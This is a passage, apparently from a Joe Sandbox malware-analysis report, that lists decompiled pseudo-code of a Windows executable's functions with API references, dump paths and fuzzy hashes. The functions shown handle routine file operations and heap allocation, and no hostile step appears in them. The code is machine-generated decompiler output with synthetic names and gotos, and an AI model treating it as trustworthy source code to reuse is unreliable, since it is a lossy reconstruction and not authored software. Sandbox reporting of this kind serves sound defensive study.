					_t70 =  *(_t76 - 0x20);
					E00CC1732(_t76 - 0x24, _t68, 1);
					_t74 =  *((intOrPtr*)(_t76 + 8));
					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
					_t16 = _t70 + 1; // 0x1
					E00CC18A9(_t74, _t16);
					_t47 =  *((intOrPtr*)(_t76 - 0x10));
					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
							E00CD1B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
						} else {
							_t72 = _t70 >> 1;
							E00CD1BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
							 *((short*)( *_t74 + _t72 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t74 + 4)));
						_push( *_t74);
						_push( *((intOrPtr*)(_t76 - 0x24)));
						E00CD1C3B();
					}
					E00CC18A9(_t74, E00CE3E13( *_t74));
					_t55 = 1;
				}
				_t39 =  *((intOrPtr*)(_t76 - 0x24));
				 *((intOrPtr*)(_t76 - 4)) = 2;
				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
					if( *((char*)(_t76 - 0x14)) != 0) {
						E00CCF445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
						_t39 =  *((intOrPtr*)(_t76 - 0x24));
					}
					L00CE3E2E(_t39);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t55;
			}










                                                    0x00cc1e50
                                                    0x00cc1e55
                                                    0x00cc1e5e
                                                    0x00cc1e62
                                                    0x00cc1e65
                                                    0x00cc1e68
                                                    0x00cc1e6b
                                                    0x00cc1e6e
                                                    0x00cc1e71
                                                    0x00cc1e74
                                                    0x00cc1e75
                                                    0x00cc1e79
                                                    0x00cc1e7c
                                                    0x00cc1e7f
                                                    0x00cc1e86
                                                    0x00cc1e8e
                                                    0x00cc1e96
                                                    0x00cc1ea1
                                                    0x00cc1ea4
                                                    0x00cc1ea8
                                                    0x00cc1eae
                                                    0x00cc1eb3
                                                    0x00cc1ebd
                                                    0x00cc1ed5
                                                    0x00cc1ef6
                                                    0x00cc1ed7
                                                    0x00cc1ed7
                                                    0x00cc1edf
                                                    0x00cc1ee8
                                                    0x00cc1ee8
                                                    0x00cc1ebf
                                                    0x00cc1ebf
                                                    0x00cc1ec2
                                                    0x00cc1ec4
                                                    0x00cc1ec7
                                                    0x00cc1ec7
                                                    0x00cc1f06
                                                    0x00cc1f0c
                                                    0x00cc1f0e
                                                    0x00cc1f0f
                                                    0x00cc1f12
                                                    0x00cc1f1b
                                                    0x00cc1f21
                                                    0x00cc1f27
                                                    0x00cc1f2c
                                                    0x00cc1f2c
                                                    0x00cc1f30
                                                    0x00cc1f35
                                                    0x00cc1f3c
                                                    0x00cc1f44

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC1E55
                                                      • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                    • _wcslen.LIBCMT ref: 00CC1EFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$_wcslen
                                                    • String ID:
                                                    • API String ID: 2838827086-0
                                                    • Opcode ID: b7461bebbbc28144f026304d5a60f3a19d998612a225dcde454b1efdf13d348e
                                                    • Instruction ID: 4bb41acaba3304de715f7f26ee629f88f492358e10789995a741638a42564687
                                                    • Opcode Fuzzy Hash: b7461bebbbc28144f026304d5a60f3a19d998612a225dcde454b1efdf13d348e
                                                    • Instruction Fuzzy Hash: 4D314B71904249AFCF15EF9AC945EEEBBF6AF49300F1400AEF845A7252CB325E41DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E00CC9DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t35;
				signed char _t50;
				signed int* _t52;
				signed char _t58;
				void* _t59;
				void* _t60;
				signed int* _t61;
				signed int* _t63;

				_t60 = __esi;
				_t59 = __ecx;
				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 8));
				}
				_t52 = _a4;
				_t50 = 1;
				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
					_t58 = 0;
					_v25 = 0;
				} else {
					_t58 = 1;
					_v25 = 1;
				}
				_push(_t60);
				_t61 = _a8;
				if(_t61 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t50;
					if(( *_t61 | _t61[1]) == 0) {
						goto L9;
					}
				}
				_t63 = _a12;
				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
					_t50 = 0;
				}
				if(_t58 != 0) {
					E00CD138A(_t52, _t58,  &_v24);
				}
				if(_v26 != 0) {
					E00CD138A(_t61, _t58,  &_v8);
				}
				if(_t50 != 0) {
					E00CD138A(_t63, _t58,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t35;
			}
















                                                    0x00cc9da2
                                                    0x00cc9da8
                                                    0x00cc9db1
                                                    0x00cc9dbc
                                                    0x00cc9dbc
                                                    0x00cc9dc2
                                                    0x00cc9dc8
                                                    0x00cc9dcb
                                                    0x00cc9ddc
                                                    0x00cc9dde
                                                    0x00cc9dd4
                                                    0x00cc9dd4
                                                    0x00cc9dd6
                                                    0x00cc9dd6
                                                    0x00cc9de2
                                                    0x00cc9de3
                                                    0x00cc9de9
                                                    0x00cc9df6
                                                    0x00cc9df6
                                                    0x00cc9deb
                                                    0x00cc9df0
                                                    0x00cc9df4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9df4
                                                    0x00cc9dfb
                                                    0x00cc9e01
                                                    0x00cc9e0b
                                                    0x00cc9e0b
                                                    0x00cc9e0f
                                                    0x00cc9e16
                                                    0x00cc9e16
                                                    0x00cc9e20
                                                    0x00cc9e29
                                                    0x00cc9e29
                                                    0x00cc9e31
                                                    0x00cc9e3a
                                                    0x00cc9e3a
                                                    0x00cc9e4a
                                                    0x00cc9e58
                                                    0x00cc9e68
                                                    0x00cc9e70
                                                    0x00cc9e7c

                                                    APIs
                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                    • Instruction ID: e02f98ade095a0571b626c3091a79e40a4c4dfa9c7643e11cbed70e07640cad1
                                                    • Opcode Fuzzy Hash: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                    • Instruction Fuzzy Hash: 1221CE31248285ABC714DF24C899FAABBE4EF55304F08491DF8E687151D339EA0DDB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CC966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
				short _v0;
				signed int _t27;
				void* _t29;
				signed char _t38;
				signed int _t42;
				long _t45;
				void* _t46;
				long _t48;

				E00CDEC50(0x1000);
				_t38 = _a4104;
				_t46 = __ecx;
				_t42 = _t38 >> 1;
				if((_t38 & 0x00000010) != 0) {
					L3:
					_t48 = 1;
					__eflags = 1;
				} else {
					_t52 =  *((char*)(__ecx + 0x30));
					if( *((char*)(__ecx + 0x30)) != 0) {
						goto L3;
					} else {
						_t48 = 0;
					}
				}
				 *(_t46 + 0x20) = _t38;
				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
				_t27 =  *(E00CCC27E(_t52, _a4100)) & 0x0000ffff;
				if(_t27 == 0x2e || _t27 == 0x20) {
					if((_t38 & 0x00000020) != 0) {
						goto L8;
					} else {
						_t39 = _a4100;
						_t29 = _t27 | 0xffffffff;
					}
				} else {
					L8:
					_t39 = _a4100;
					__eflags = 0;
					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
				}
				 *(_t46 + 8) = _t29;
				if(_t29 == 0xffffffff && E00CCBB03(_t39,  &_v0, 0x800) != 0) {
					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
				}
				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
				 *((char*)(_t46 + 0x1c)) = 1;
				 *((char*)(_t46 + 0x15)) = 0;
				return E00CD0602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
			}











                                                    0x00cc9673
                                                    0x00cc9679
                                                    0x00cc9685
                                                    0x00cc9687
                                                    0x00cc968c
                                                    0x00cc9698
                                                    0x00cc969a
                                                    0x00cc969a
                                                    0x00cc968e
                                                    0x00cc968e
                                                    0x00cc9692
                                                    0x00000000
                                                    0x00cc9694
                                                    0x00cc9694
                                                    0x00cc9694
                                                    0x00cc9692
                                                    0x00cc96a9
                                                    0x00cc96ac
                                                    0x00cc96b7
                                                    0x00cc96bd
                                                    0x00cc96c7
                                                    0x00000000
                                                    0x00cc96c9
                                                    0x00cc96c9
                                                    0x00cc96d0
                                                    0x00cc96d0
                                                    0x00cc96d5
                                                    0x00cc96d5
                                                    0x00cc96d5
                                                    0x00cc96dc
                                                    0x00cc96e6
                                                    0x00cc96e6
                                                    0x00cc96ec
                                                    0x00cc96f2
                                                    0x00cc971c
                                                    0x00cc971c
                                                    0x00cc971f
                                                    0x00cc972d
                                                    0x00cc9731
                                                    0x00cc974b

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CC9F27,?,?,00CC771A), ref: 00CC96E6
                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CC9F27,?,?,00CC771A), ref: 00CC9716
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                    • Instruction ID: 8df1a19b186a8d0106ef92e29b54e20eb7bf4ec7ea910ae76e8c5b71eadffa96
                                                    • Opcode Fuzzy Hash: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                    • Instruction Fuzzy Hash: 4F21BDB15003446FE3708A65CC89FB7B7DCEB49324F100A1DFAA5C62D1C774A9849631
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00CC9E80(void* __ecx) {
				long _v8;
				void* __ebp;
				long _t13;
				long _t15;
				signed int _t17;
				char* _t33;
				void* _t36;
				long _t37;
				void* _t39;

				_push(__ecx);
				_t36 = __ecx;
				_t33 = __ecx + 0x1e;
				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
					_t21 = __ecx + 0x32;
					goto L4;
				} else {
					if( *_t33 == 0) {
						L12:
						_t17 = _t13 | 0xffffffff;
					} else {
						_t21 = __ecx + 0x32;
						E00CC6D5B(0xd01098, _t39, __ecx + 0x32);
						L4:
						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
							_v8 = _v8 & 0x00000000;
							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
							_t37 = _t15;
							if(_t37 != 0xffffffff) {
								L10:
								asm("cdq");
								_t17 = 0 + _t37;
								asm("adc edx, 0x0");
							} else {
								_t13 = GetLastError();
								if(_t13 == 0) {
									goto L10;
								} else {
									if( *_t33 == 0) {
										goto L12;
									} else {
										E00CC6D5B(0xd01098, _t39, _t21);
										goto L10;
									}
								}
							}
						} else {
							_t17 =  *(_t36 + 0x28);
						}
					}
				}
				return _t17;
			}












                                                    0x00cc9e83
                                                    0x00cc9e86
                                                    0x00cc9e8d
                                                    0x00cc9e90
                                                    0x00cc9ea7
                                                    0x00000000
                                                    0x00cc9e92
                                                    0x00cc9e95
                                                    0x00cc9f02
                                                    0x00cc9f02
                                                    0x00cc9e97
                                                    0x00cc9e97
                                                    0x00cc9ea0
                                                    0x00cc9eaa
                                                    0x00cc9eae
                                                    0x00cc9eb8
                                                    0x00cc9ec7
                                                    0x00cc9ecd
                                                    0x00cc9ed2
                                                    0x00cc9eee
                                                    0x00cc9ef3
                                                    0x00cc9ef8
                                                    0x00cc9efa
                                                    0x00cc9ed4
                                                    0x00cc9ed4
                                                    0x00cc9edc
                                                    0x00000000
                                                    0x00cc9ede
                                                    0x00cc9ee1
                                                    0x00000000
                                                    0x00cc9ee3
                                                    0x00cc9ee9
                                                    0x00000000
                                                    0x00cc9ee9
                                                    0x00cc9ee1
                                                    0x00cc9edc
                                                    0x00cc9eb0
                                                    0x00cc9eb0
                                                    0x00cc9eb3
                                                    0x00cc9eae
                                                    0x00cc9e95
                                                    0x00cc9f01

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CC9EC7
                                                    • GetLastError.KERNEL32 ref: 00CC9ED4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                    • Instruction ID: 2b3f81c6511420551fe6cfc9a0473ccbf0e1641021b997f2e09289bfabcdde78
                                                    • Opcode Fuzzy Hash: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                    • Instruction Fuzzy Hash: 6811A571600700ABD724C669C849FA6B7E9EB55360F504A2DE563D26D0D7B0EE45C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00CE8E54(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0xd226e4, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00CE8C34();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00CE7A5E(_t10, _t13, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00CE91A8())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00CE8DCC(_t14);
					goto L6;
				}
				_t9 = E00CE8E06(__ecx, _a8); // executed
				return _t9;
			}









                                                    0x00ce8e54
                                                    0x00ce8e54
                                                    0x00ce8e5a
                                                    0x00ce8e5f
                                                    0x00ce8e6d
                                                    0x00ce8e70
                                                    0x00ce8e72
                                                    0x00ce8e7d
                                                    0x00ce8e80
                                                    0x00ce8ea7
                                                    0x00ce8eb1
                                                    0x00ce8eb7
                                                    0x00ce8eb9
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce8e98
                                                    0x00ce8e9a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce8e9d
                                                    0x00ce8ea2
                                                    0x00ce8ea3
                                                    0x00ce8ea5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce8ea5
                                                    0x00ce8e8f
                                                    0x00000000
                                                    0x00ce8e8f
                                                    0x00ce8e82
                                                    0x00ce8e87
                                                    0x00ce8e8d
                                                    0x00ce8e8d
                                                    0x00ce8e8d
                                                    0x00000000
                                                    0x00ce8e8d
                                                    0x00ce8e75
                                                    0x00000000
                                                    0x00ce8e7a
                                                    0x00ce8e64
                                                    0x00000000

                                                    APIs
                                                    • _free.LIBCMT ref: 00CE8E75
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00D01098,00CC17CE,?,?,00000007,?,?,?,00CC13D6,?,00000000), ref: 00CE8EB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap$_free
                                                    • String ID:
                                                    • API String ID: 1482568997-0
                                                    • Opcode ID: 79c70cfafa544db70ea441021aed409da36e16570049ac987e0daa5763fcb100
                                                    • Instruction ID: b6f82b6f933a8d4937c7ca7e1e9cfa0b6afc874cfeeb31376959461a5052db0e
                                                    • Opcode Fuzzy Hash: 79c70cfafa544db70ea441021aed409da36e16570049ac987e0daa5763fcb100
                                                    • Instruction Fuzzy Hash: 32F0F63A2012C27ADB212A279C05F6F37588F82B70F680125F82CA7191DF74CE08A1A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CD109E(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 != 0) {
					_t14 = 0;
					_t17 = _v8;
					_t15 = 1;
					do {
						if((_t17 & _t15) != 0) {
							_t14 = _t14 + 1;
						}
						_t15 = _t15 + _t15;
					} while (_t15 != 0);
					if(_t14 >= 1) {
						return _t14;
					}
					return 1;
				} else {
					return _t8 + 1;
				}
			}









                                                    0x00cd10b2
                                                    0x00cd10ba
                                                    0x00cd10c1
                                                    0x00cd10c5
                                                    0x00cd10c8
                                                    0x00cd10ca
                                                    0x00cd10cc
                                                    0x00cd10ce
                                                    0x00cd10ce
                                                    0x00cd10cf
                                                    0x00cd10cf
                                                    0x00cd10d6
                                                    0x00000000
                                                    0x00cd10d8
                                                    0x00cd10db
                                                    0x00cd10bc
                                                    0x00cd10be
                                                    0x00cd10be

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00CD10AB
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00CD10B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                    • Instruction ID: 838c8e4d8be9534f84defd4e27eac4ad653253b08083e454225c31d6ec892772
                                                    • Opcode Fuzzy Hash: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                    • Instruction Fuzzy Hash: 03E09272B10185B78F0997A49C05ABF72DEEA442443184177EA13D3201F934EF418760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCA4ED(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t13;
				signed int _t19;
				signed int _t20;

				E00CDEC50(0x1000);
				_t13 = SetFileAttributesW(_a4, _a8); // executed
				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
				if(_t13 == 0 && E00CCBB03(_a4,  &_v4100, 0x800) != 0) {
					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t20;
			}







                                                    0x00cca4f5
                                                    0x00cca501
                                                    0x00cca509
                                                    0x00cca50e
                                                    0x00cca53a
                                                    0x00cca53a
                                                    0x00cca541

                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    • Opcode ID: b9606aa19b3353566a66d835d741e24236723531a0d62e6f85d4ce513b479649
                                                    • Instruction ID: 492569a820869221fd1788fa113b580d7e3274d5557f1df9cf91546c9ab7abc0
                                                    • Opcode Fuzzy Hash: b9606aa19b3353566a66d835d741e24236723531a0d62e6f85d4ce513b479649
                                                    • Instruction Fuzzy Hash: 84F0393624024DBBDF016F60DC45FEE3B6CAF04389F488066B949D6160DB71DE99EA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCA1E0(WCHAR* _a4) {
				short _v4100;
				int _t11;
				signed int _t17;
				signed int _t18;

				E00CDEC50(0x1000);
				_t11 = DeleteFileW(_a4); // executed
				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
				if(_t11 == 0 && E00CCBB03(_a4,  &_v4100, 0x800) != 0) {
					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t18;
			}







                                                    0x00cca1e8
                                                    0x00cca1f1
                                                    0x00cca1f9
                                                    0x00cca1fe
                                                    0x00cca227
                                                    0x00cca227
                                                    0x00cca22e

                                                    APIs
                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
